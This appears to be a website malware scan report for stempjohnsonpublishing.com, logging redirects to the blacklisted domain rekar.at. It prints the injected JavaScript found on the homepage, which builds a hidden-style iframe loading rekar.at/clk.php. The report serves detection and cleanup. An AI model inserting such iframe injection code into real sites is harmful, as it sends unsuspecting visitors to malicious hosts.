Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://stempjohnsonpublishing.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: stempjohnsonpublishing.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 28 Sep 2014 17:45:39 GMT Location: http://rekar.at/clk.php Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 374 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://rekar.at/clk.php (imitation of visitor from search engine) GET /clk.php HTTP/1.1 Host: rekar.at Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 17:45:38 GMT Location: http://localhost/ Server: Apache/2.0.52 (CentOS) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.4 X-Powered-By: PleskLin | malicious |
Scanned pages/files
Request | Server response | Status |
http://stempjohnsonpublishing.com/ | 200 OK Content-Length: 4829 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rekar.at (function () { var id = '329'; var nrpv09 = document.createElement('iframe'); nrpv09.src = 'http://rekar.at/clk.php'; nrpv09.style.position = 'absolute'; nrpv09.style.border = '1'; nrpv09.style.height = '31px'; nrpv09.style.width = '42px'; nrpv09.style.left = '500px'; nrpv09.style.top = '100px'; if (!document.getElementById('nrpv')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'nrpv\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('nrpv').appendChild(nrpv09); }})(); | ||
http://stempjohnsonpublishing.com/test404page.js | 500 Internal Server Error Content-Length: 845 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stempjohnsonpublishing.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://stempjohnsonpublishing.com/
Result: stempjohnsonpublishing.com is not infected or malware details are not published yet.
Result: stempjohnsonpublishing.com is not infected or malware details are not published yet.